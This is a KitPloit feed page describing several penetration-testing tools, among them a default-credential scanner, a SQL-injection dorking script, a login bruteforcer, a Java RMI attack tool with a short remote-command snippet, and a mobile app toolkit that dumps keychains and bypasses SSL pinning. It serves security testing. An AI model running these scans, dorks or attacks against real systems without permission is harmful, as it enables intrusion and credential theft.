Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

changeme - A Default Credential Scanner

$
0
0

A default credential scanner.

About
Getting default credentials added to commercial scanners is often difficult and slow. changeme is designed to be simple to add new credentials without having to write any code or modules.
changeme keeps credential data separate from code. All credentials are stored in yaml files so they can be both easily read by humans and processed by changeme. Credential files can be created by using the ./changeme.py --mkcred tool and answering a few questions.
changeme supports the http/https, mssql, mysql, postgres, ssh, ssh w/key, snmp, mongodb and ftp protocols. Use ./changeme.py --dump to output all of the currently available credentials.
You can load your targets using a variety of methods, single ip address/host, subnet, list of hosts, nmap xml file and Shodan query. All methods except for Shodan are loaded as a positional argument and the type is inferred.

Installation
changeme has only been tested on Linux and has known issues on Windows and OS X/macOS. Use docker to run changeme on the unsupported platforms.
Stable versions of changeme can be found on the releases page.
For mssql support, unixodbc-dev needs to be installed prior to installing the pyodbc.
PhantomJS is required in your PATH for HTML report screenshots.
Use pip to install the required python modules: pip install -r requirements.txt

Docker
A convenient way of running changeme is to do so inside a Docker container. You can run a pre-built container from Docker Hub, or build your own using the instructions below.

Run changeme in Docker
  1. Download the container: docker pull ztgrace/changeme
  2. Run the container: docker run -it ztgrace/changeme /bin/bash

Build from Dockerfile
  1. Build the docker container: docker build -t changeme .
  2. Run changeme from inside the container: `docker run -it changeme /bin/bash'

Usage Examples
Below are some common usage examples.
  • Scan a single host: ./changeme.py 192.168.59.100
  • Scan a subnet for default creds: ./changeme.py 192.168.59.0/24
  • Scan using an nmap file ./changeme.py subnet.xml
  • Scan a subnet for Tomcat default creds and set the timeout to 5 seconds: ./changeme.py -s 192.168.59.0/24 -n "Apache Tomcat" --timeout 5
  • Use Shodan to populate a targets list and check them for default credentials: ./changeme.py --shodan_query "Server: SQ-WEBCAM" --shodan_key keygoeshere -c camera
  • Scan for SSH and known SSH keys: ./changeme.py 192.168.59.0/24 --protocols ssh,ssh_key
  • Scan a host for SNMP creds using the protocol syntax: ./changeme.py snmp://192.168.1.20


CyberScan - Tool To Analyse Packets, Decoding , Scanning Ports, And Geolocation

$
0
0

CyberScan is an open source penetration testing tool that can analyse packets , decoding , scanning ports, pinging and geolocation of an IP including (latitude, longitude , region , country ...)



Operating Systems Supported
  • Windows XP/7/8/8.1/10
  • GNU/Linux
  • MacOSX

Installation
You can download CyberScan by cloning the Git repository:
git clone https://github.com/medbenali/CyberScan.git
cd CyberScan/
python CyberScan.py -v
CyberScan works out of the box with Python version 2.6.x and 2.7.x.


cve-search - A Tool To Perform Local Searches For Known Vulnerabilities

$
0
0


cve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs.
The main objective of the software is to avoid doing direct and public lookup into the public CVE databases. This is usually faster to do local lookups and limits your sensitive queries via the Internet.
cve-search includes a back-end to store vulnerabilities and related information, an intuitive web interface for search and managing vulnerabilities, a series of tools to query the system and a web API interface.
cve-search is used by many organizations including the public CVE services of CIRCL.

Requirements
The requirements can be installed with pip:
sudo pip3 install -r requirements.txt

Installation of MongoDB
First, you'll need to have a Python 3 installation (3.3 or higher). Then you need to install MongoDB (2.2) from source (this should also work with any standard packages from your favorite distribution). Don't forget to install the headers for development while installing MongoDB. You can go to http://docs.mongodb.org/manual/installation/ for to get the packages for your distribution, or http://www.mongodb.org/downloads for the source code.

Populating the database
For the initial run, you need to populate the CVE database by running:
./sbin/db_mgmt.py -p
./sbin/db_mgmt_cpe_dictionary.py
./sbin/db_updater.py -c
It will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. The initial Common Platform Enumeration (CPE) import might take some time depending of your configuration.
If you want to add the cross-references from NIST, Red Hat and other vendors:
./sbin/db_mgmt_ref.py
A more detailed documentation can be found in the Documentations folder of the project.

Databases and collections
The MongoDB database is called cvedb and there are 11 collections:
  • cves (Common Vulnerabilities and Exposure items) - source NVD NIST
  • cpe (Common Platform Enumeration items) - source NVD NIST
  • cwe (Common Weakness Enumeration items) - source NVD NIST
  • capec (Common Attack Pattern Enumeration and Classification) - source NVD NIST
  • ranking (ranking rules per group) - local cve-search
  • d2sec (Exploitation reference from D2 Elliot Web Exploitation Framework) - source d2sec.com
  • MITRE Reference Key/Maps - source MITRE reference Key/Maps
  • ms - (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) - source Microsoft
  • exploitdb (Offensive Security - Exploit Database) - source offensive security
  • info (metadata of each collection like last-modified) - local cve-search
  • via4 VIA4CVE cross-references.
The Redis database has 3 databases:
  • 10: The cpe (Common Platform Enumeration) cache - source MongoDB cvedb collection cpe
  • 11: The notification database - source cve-search
  • 12: The CVE reference database is a cross-reference database to CVE ids against various vendors ID - source NVD NIST/MITRE
The reference database has 3 additional sources:

Updating the database
An updater script helps to start the db_mgmt_*
./sbin/db_updater.py -v
You can run it in a crontab, logging is done in syslog by default.

Repopulating the database
To easily drop and re-populate all the databases
./sbin/db_updater.py -v -f
This will drop all the existing external sources and reimport everything. This operation can take some time and it's usually only required when new attributes parsing are added in cve-search.

Usage
You can search the database using search.py
./bin/search.py -p cisco:ios:12.4
./bin/search.py -p cisco:ios:12.4 -o json
./bin/search.py -f nagios -n
./bin/search.py -p microsoft:windows_7 -o html
If you want to search all the WebEx vulnerabilities and only printing the official references from the supplier.
./bin/search.py -p webex: -o csv  -v "cisco"
You can also dump the JSON for a specific CVE ID.
./bin/search.py -c CVE-2010-3333
Or you can use the XMPP bot
./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword
Or dump the last 2 CVE entries in RSS or Atom format
./bin/dump_last.py -f atom -l 2
Or you can use the webinterface.
./web/index.py

Usage of the ranking database
There is a ranking database allowing to rank software vulnerabilities based on their common platform enumeration name. The ranking can be done per organization or department within your organization or any meaningful name for you.
As an example, you can add a partial CPE name like "sap:netweaver" which is very critical for your accounting department.
./sbin/db_ranking.py  -c "sap:netweaver" -g "accounting" -r 3
and then you can lookup the ranking (-r option) for a specific CVE-ID:
./bin/search.py -c CVE-2012-4341  -r  -n

Advanced usage
As cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder what are the top vendors using the term "unknown" for their vulnerabilities:
python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort  | uniq -c  | sort -nr | head -10

1500 oracle
381 sun
372 hp
232 google
208 ibm
126 mozilla
103 microsoft
100 adobe
78 apple
68 linux
You can compare CVSS (Common Vulnerability Scoring System ) values of some products based on their CPE name. Like comparing oracle:java versus sun:jre and using R to make some statistics about their CVSS values:
python3 bin/search.py -p oracle:java -o json  | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu. Median Mean 3rd Qu. Max.
1.800 5.350 9.300 7.832 10.000 10.000


python3 bin/search.py -p sun:jre -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu. Median Mean 3rd Qu. Max.
0.000 5.000 7.500 7.333 10.000 10.000

Fulltext indexing
If you want to index all the CVEs from your current MongoDB collection:
./sbin/db_fulltext.py
and you query the fulltext index (to get a list of matching CVE-ID):
./bin/search_fulltext.py -q NFS -q Linux
or to query the fulltext index and output the JSON object for each CVE-ID:
./bin/search_fulltext.py -q NFS -q Linux -f

Fulltext visualization
The fulltext indexer visualization is using the fulltext indexes to build a list of the most common keywords used in CVE. NLTK is required to generate the keywords with the most common English stopwords and lemmatize the output. NTLK for Python 3 exists but you need to use the alpha version of NLTK.
./bin/search_fulltext.py  -g -s >cve.json


You can see a visualization on the demo site.

Web interface
The web interface is a minimal interface to see the last CVE entries and query a specific CVE. You'll need flask in order to run the website and Flask-PyMongo. To start the web interface:
cd ./web
./index.py
Then you can connect on http://127.0.0.1:5000/ to browser the last CVE.

Web API interface
The web interface includes a minimal JSON API to get CVE by ID, by vendor or product. A public version of the API is also accessible on cve.circl.lu.
List the know vendors in JSON
curl http://127.0.0.1:5000/api/browse/
Dump the product of a specific vendor in JSON
curl  http://127.0.0.1:5000/api/browse/zyxel 
{
"product": [
"n300_netusb_nbg-419n",
"n300_netusb_nbg-419n_firmware",
"p-660h-61",
"p-660h-63",
"p-660h-67",
"p-660h-d1",
"p-660h-d3",
"p-660h-t1",
"p-660h-t3",
"p-660hw",
"p-660hw_d1",
"p-660hw_d3",
"p-660hw_t3"
],
"vendor": "zyxel"
}
Find the associated vulnerabilities to a vendor and a product
curl  http://127.0.0.1:5000/api/search/zyxel/p-660hw
[{"cwe": "CWE-352", "references": ["http://www.exploit-db.com/exploits/33518", "http://secunia.com/advisories/58513", "http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html", "http://osvdb.org/show/osvdb/107449"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw:_t1:v3"], "Published": "2014-06-16T14:55:09.713-04:00", "id": "CVE-2014-4162", "Modified": "2014-07-17T01:07:29.683-04:00", "cvss": 6.8, "summary": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1."}, {"cwe": "CWE-20", "references": ["http://www.kb.cert.org/vuls/id/893726"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660h-63:-", "cpe:/h:zyxel:p-660h-t1:-", "cpe:/h:zyxel:p-660h-d3:-", "cpe:/h:zyxel:p-660h-t3:v2", "cpe:/h:zyxel:p-660h-t1:v2", "cpe:/h:zyxel:p-660h-d1:-", "cpe:/h:zyxel:p-660h-67:-", "cpe:/h:zyxel:p-660h-61:-", "cpe:/h:zyxel:p-660hw_t3:v2", "cpe:/h:zyxel:p-660hw_t3:-", "cpe:/h:zyxel:p-660hw_d3:-", "cpe:/h:zyxel:p-660hw_d1:v2", "cpe:/h:zyxel:p-660hw_d1:-", "cpe:/h:zyxel:p-660hw:_t1:v2", "cpe:/h:zyxel:p-660hw:_t1:-"], "Published": "2014-04-01T23:58:16.967-04:00", "id": "CVE-2013-3588", "Modified": "2014-04-02T11:29:53.243-04:00", "cvss": 7.8, "summary": "The web management interface on Zyxel P660 devices allows remote attackers to cause a denial of service (reboot) via a flood of TCP SYN packets."}, {"cwe": "CWE-79", "references": ["http://osvdb.org/ref/99/rompager407.pdf", "http://osvdb.org/99694", "http://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf"], "vulnerable_configuration": ["cpe:/h:d-link:dsl-2640r:-", "cpe:/h:d-link:dsl-2641r:-", "cpe:/h:huawei:mt882:-", "cpe:/h:sitecom:wl-174:-", "cpe:/h:tp-link:td-8816:-", "cpe:/a:allegrosoft:rompager:4.07", "cpe:/h:zyxel:p-660hw_d1:-"], "Published": "2014-01-16T14:55:04.607-05:00", "id": "CVE-2013-6786", "Modified": "2014-01-17T11:01:47.353-05:00", "cvss": 4.3, "summary": "Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4.51, as used on the ZyXEL P660HW-D1, Huawei MT882, Sitecom WL-174, TP-LINK TD-8816, and D-Link DSL-2640R and DSL-2641R, when the \"forbidden author header\" protection mechanism is bypassed, allows remote attackers to inject arbitrary web script or HTML by requesting a nonexistent URI in conjunction with a crafted HTTP Referer header that is not properly handled in a 404 page. NOTE: there is no CVE for a \"URL redirection\" issue that some sources list separately."}, {"cwe": "CWE-79", "references": ["http://xforce.iss.net/xforce/xfdb/41109", "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw_t3:v2", "cpe:/h:zyxel:p-660hw:_t1:v2", "cpe:/h:zyxel:p-660hw_d1:v2", "cpe:/h:zyxel:p-660hw_t3:-", "cpe:/h:zyxel:p-660hw:_t1:-", "cpe:/h:zyxel:p-660hw_d3:-", "cpe:/h:zyxel:p-660hw_d1:-"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1257", "Modified": "2012-05-31T00:00:00.000-04:00", "cvss": 4.3, "summary": "Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter."}, {"id": "CVE-2008-1256", "references": ["http://xforce.iss.net/xforce/xfdb/41108", "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "Modified": "2011-03-07T22:06:25.080-05:00", "cvss": 10.0, "summary": "The ZyXEL P-660HW series router has \"admin\" as its default password, which allows remote attackers to gain administrative access."}, {"cwe": "CWE-264", "references": ["http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/", "http://xforce.iss.net/xforce/xfdb/41114"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1255", "Modified": "2008-09-05T17:37:15.440-04:00", "cvss": 10.0, "summary": "The ZyXEL P-660HW series router maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user."}, {"cwe": "CWE-352", "references": ["http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded", "http://www.gnucitizen.org/projects/router-hacking-challenge/", "http://xforce.iss.net/xforce/xfdb/41111"], "vulnerable_configuration": ["cpe:/h:zyxel:p-660hw"], "Published": "2008-03-10T13:44:00.000-04:00", "id": "CVE-2008-1254", "Modified": "2008-09-05T17:37:15.287-04:00", "cvss": 6.8, "summary": "Multiple cross-site request forgery (CSRF) vulnerabilities on the ZyXEL P-660HW series router allow remote attackers to (1) change DNS servers and (2) add keywords to the \"bannedlist\" via unspecified vectors."}]

Software using cve-search

IntRec-Pack - Intelligence and Reconnaissance Package/Bundle installer

$
0
0

Intelligence and Reconnaissance Package/Bundle installer.
IntRec-Pack is a Bash script designed to download, install and deploy several quality OSINT, Recon and Threat Intelligence tools. Due to the fact it manages the installation of the various dependencies related to these programs as well it aims to be a comprehensive assistant in setting up your intelligence gathering environment. Below is an overview of the tools and utilities it will help you set up.

+-----------------------+-------------------------------------------+
| Tool | Utility type and feature summary |
+-----------------------+-------------------------------------------+
|1. QuickScan | Port Scanner/WHOIS/Domain Resolver |
|2. DNSRecon | Advanced DNS Enumeration & Domain Utility |
|3. Sublist3r | OSINT Based Subdomain Enumeration |
|4. TekDefense-Automator| OSINT Based IP, URL and Hash Analyzer |
|5. TheHarvester | eMail, vHost, Domain and PII Enumeration |
|6. IOC-Parser | Threat Intel, parses IOC data from reports|
|7. PyParser-CVE | Multi Source Exploit Parser/CVE Lookup |
|8. Mimir | HoneyDB CLI/Threat Intelligence Utility |
|9. Harbinger | Cymon.io, Virus Total, Threat Feed Parser |
|10.Spiderfoot | Advanced OSINT/Reconnaissance Framework |
+-----------------------+-------------------------------------------+
Furthermore I have included functionality within the Bash script that allows the user to easily pull up two web based resources. Namely OSINT-Framework and HoneyDB. The former serves as a curated list of open source intelligence tools, websites and related materials for use as a reference guide. While the latter is an OSINT aggregative threat intelligence pool that collects and organizes data provided by HoneyPy honeypots. My Command Line Interface for which is included in the selection of tools available for download with IntRec-Pack as well.

Usage
Clone the tool from the repo and make it executable like so.
git clone https://github.com/NullArray/IntRec-Pack.git
cd IntRec-Pack
chmod +x intrec.sh
After which it can be started from the command line with sudo ./intrec.sh. Upon doing so you will be presented with a menu the options for which are as follows:
1) Help                  4) Specify Install Location
2) List and Install 5) Online Resources
3) Install All 6) Quit
The help option displays further usage information and general details about the tool. List and Install will list all the tools available for download/installation and lets you select the ones you would like. Upon doing so the tool plus it's dependencies will be installed in the current working directory. Unless the Specify Install Location option has been used to provide a path to a custom location. Install All will download and install all the tools available with this script and Online Resources will open the web applications previously mentioned.

Update
The script has been updated to version 1.0.1.

Changelog
Each installation operation now has its own function in order to make the script modular. This will also allow for the easy addition of operations that would install other/more tools in the future.
Additional checks have been added to the script in order to look for the presence of utilities such as wget, git and pip. This is important because some distros such as Debian and Devuan do not come with some of these utilities installed by default. Should the script find any of these utilities are missing it will attempt to automatically resolve the issue. Making the script effective and compatible with most Debian based distros.
From now on IntRec-Pack will check to see if it has been started with super user privilege. Since there are a lot of sudo commands in the script this will prevent the user from running into trouble halfway through the execution.


DorkNet - Selenium Powered Python Script To Automate Searching For Vulnerable Web Apps

$
0
0

Selenium powered Python script to automate searching the web for vulnerable applications.
DorkNet can take a single dork or a list of dorks as arguments. After the proper command line arguments have been passed, the script will use Selenium and Geckodriver to find the results we want and save them to a textfile for further processing with SQLmap or similar utilities.

Usage
git clone https://github.com/NullArray/DorkNet.git
cd DorkNet
python dorknet.py
The options for the program are as follows.
-h, --help              show this help message and exit
-d DORK, --dork DORK specify the dork you wish to use
-l LIST, --list LIST specify path to list with dorks
-v, --verbose toggle verbosity
Some examples for clarity.
DorkNet.py -h
DorkNet.py -d inurl:show.php?id= -v
DorkNet.py -l /path/to/list.txt --verbose

Dependencies
You will need the Mozilla Geckodriver for this to work. After it has been installed feel free to use the requirements file i made for this program
pip install -r requirements.txt

Known Issue
By using Selenium and Geckodriver, DorkNet is effective at emulating a regular browser. In this manner the program is able to avoid captchas most of the time. However on limited occasions, Google throws one regardless. The same sometimes happens when manually searching for strings that look like a dork. Should you encounter one, you can just fill out the captcha in the Geckodriver and DorkNet will continue it's normal operation.


EllaScanner - Passive Web Scanner

$
0
0

Passive web scanner.

EllaScanner is a simple passive web scanner. Using this tool you can simply check your site’s security state.
Usage:
./Start.py https:// or http://

Scanning of the site consists several phases:
At the first phase, you can get recommendations related to http/https headers.
The Second phase depends on information gather in the first phase, you can get CVEs related to server’s version.

After this, the scanner uses sucuri.net and prints information about defaces, malicious codes, etc.
And last but not least, if the site is Georgian you can get information from checknet.ge about site’s historical states.
see more

Installation
pip install -r requirements.txt
./Start.py



Blazy - Modern Login Bruteforcer Which Also Tests For CSRF, Clickjacking, Cloudflare and WAF

$
0
0

Blazy is a modern login page bruteforcer.


Features
  • Easy target selections
  • Smart form and error detection
  • CSRF and Clickjacking Scanner
  • Cloudflare and WAF Detector
  • 90% accurate results
  • Checks for login bypass via SQL injection
  • Multi-threading
  • 100% accurate results
  • Better form detection and compatibility

Requirements
  • Beautiful Soup
  • Mechanize

Usages
Open your terminal and enter
git clone https://github.com/UltimateHackers/Blazy
Now enter the following command
cd Blazy
Lets install the required modules before running Blazy
pip install -r requirements.txt
Now run Blazy by entering
python blazy.py

Now enter your desired login page URL and Blazy will do its thing:


BaRMIe - Java RMI Enumeration And Attack Tool

$
0
0

BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.
RMI services often expose dangerous functionality without adequate security controls, however RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, however even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64-bits/9 quintillion possibilities) being performed over the network.
The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network.

Disclaimer
BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program.

Usage
Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information.
$ java -jar BaRMIe.jar
▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████
▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀
▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███
▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄
░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒
░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░
▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░
░ v1.0
Java RMI enumeration tool.
Written by Nicky Bloor (@NickstaDB)

Warning: BaRMIe was written to aid security professionals in identifying the
insecure use of RMI services on systems which the user has prior
permission to attack. BaRMIe must be used in accordance with all
relevant laws. Failure to do so could lead to your prosecution.
The developers assume no liability and are not responsible for any
misuse or damage caused by this program.

Usage:
BaRMIe -enum [options] [host] [port]
Enumerate RMI services on the given endpoint(s).
Note: if -enum is not specified, this is the default mode.
BaRMIe -attack [options] [host] [port]
Enumerate and attack the given target(s).
Options:
--threads The number of threads to use for enumeration (default 10).
--timeout The timeout for blocking socket operations (default 5,000ms).
--targets A file containing targets to scan.
The file should contain a single host or space-separated
host and port pair per line.
Alternatively, all nmap output formats are supported, BaRMIe will
parse nmap output for port 1099, 'rmiregistry', or 'Java RMI'
services to target.
Note: [host] [port] not supported when --targets is used.
Reliability:
A +/- system is used to indicate attack reliability as follows:
[+ ]: Indicates an application-specific attack
[- ]: Indicates a JRE attack
[ + ]: Attack insecure methods (such as 'writeFile' without auth)
[ - ]: Attack Java deserialization (i.e. Object parameters)
[ +]: Does not require non-default dependencies
[ -]: Non-default dependencies are required
Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint.
Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services.
A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output.

No Vulnerable Targets Identified?
Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services.
If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future.
Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files.

Attack Types
BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door.

1. Attacking Insecure Methods
The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this:
//Get a reference to the remote RMI registry service
Registry reg = LocateRegistry.getRegistry(targetHost, targetPort);

//Get a reference to the target RMI object
Foo bar = (Foo)reg.lookup(objectName);

//Call the remote executeCommand() method
bar.executeCommand(cmd);

2. Deserialization via Object-type Paraeters
Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below:
public void setOption(String name, Object value);
public void addAll(List values);

3. Deserialization via Illegal Method Invocation
Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below:
public void setName(String name);
public Long add(Integer i1, Integer i2);
public void sum(int[] values);
The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them.



objection - Runtime Mobile Exploration

$
0
0

objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
Supporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the applications Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6.

A file system listing of the iOS applications main bundle


A file system listing of the Android applications bundle


iOS Keychain dumped for the current application, and later written to a file called keychain.json


Inline SQLite query tool


SSL Pinning bypass running for an iOS application


SSL Pinning bypass running for an Android application


sample usage
A sample session, where objection version 0.1 is used to explore the applications environment. Newer versions have the REPL prompt set to the current applications name, however usage has remained the same:



prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


Seccubus - Easy Automated Vulnerability Scanning, Reporting And Analysis

$
0
0

Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.
On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)
For more information visit [www.seccubus.com]

Seccubus Docker container

Usage

Running a full stack (db/app/frontend) in a single container. And get an interactive shell
docker run -it seccubus/seccubus /bin/bash
By default the container holds a mysql server that runs and stores data locally. If you want data persistency there are two options:
Connect the container to a remote mysql/MariaDB database with environment viariables:
docker run -ti seccubus/seccubus -e DBHOST=dns.name.of.db.host \
-e DBPOSRT=3306 \
-e DBNAME=name.of.database \
-e DBUSER=db.username \
-e DBPASS=password \
/bin/bash
Or, mount a data volume with a db directory on it
mkdir data
mmdir data/db
docker run -it seccubus/seccubus -v ($pwd)/data:/opt/seccubus/data /bin/bash
Please be aware that you can only run one container at a time if you mount a local directory on /var/lib/mysql.

Running a scan
Run the following command to start the scan 'ssllabs' in workspace 'Example' (this workspace is created by default if you use the local mysql database)
docker run -ti seccubus/seccubus scan Example ssllabs
Please be aware that you need soem data persistency here or the data will be stored in a local database that will be deleted whent he container terminates

Running a scheduler
You can run a docker container as a scheduler. This will make it run cron and allow your crontab to execute scans.You can populate the crontab by either placing a file called crontab in the /opt/seccubus/data volume or puting the lines of you crontab in evironement variables starting with CRON_
docker run -e "STACK=cron" -e "CRON_1=* 0 * * * bin/do-scan -w Example -s ssllabs" -ti seccubus/seccubus
This will spin up a container that executes scan ssllabs from workspace Example at midnight every night.
You can set the TZ vairable to control the timezone.

Controlling TLS certificates
The Seccubus container is TLS enabled by default. The environment variable TLS controls this behaviour. Of it is set to anything other then yes, TLS is turned off.
There are three ways to control the certificate:
  • Do nothing : Self signed certificates will be generated for you
  • Populate the variables TLSCERT and TLSKEY : The contents will be placed in /opt/seccubus/data/seccubus.pem and /opt/seccubus/data/seccubus.key and used
  • Put the certificates in the files seccubus.pem and seccubus.key on a data volume and mount it on /opt/seccubus/data

Show this help message
docker run -ti seccubus/seccubus help

Default command
If you don't specify a command to docker run
docker run seccubus/seccubus
The web server access log and error log will be tailed to the screen.

Other options
You can set the following environment variables:
  • STACK - Determines which part of the stack is run
    • full - Run everything
    • front - Start apache to serve the html/javascript frontend (this requires that the APIURL variable is set too)
    • api - Start apache to serve the json api at / (starts MariaDB too if required)
    • web - Start apache to serve both the html/javascript frontend and the json
    • perl - Do not start apache, just use this container as an perl backend
  • DBHOST, DBPORT, DBNAME, DBUSER, DBPASS - Database connection parameters
    • If DBHOST/DBPORT are set to 127.0.0.1/3306 the local MariaDB instance is started
  • APIURL - Path to the API url
    • Set this if your set STACK to front to redirect the API calls to an alternative relative or absolute URL.
  • BASEURI - Base URI for seccubus
    • Server the application at the value provided
  • SMTPSERVER - IP address or host name of an SMTP server to be used for notifications
  • SMTPFROM - From address used in notifications
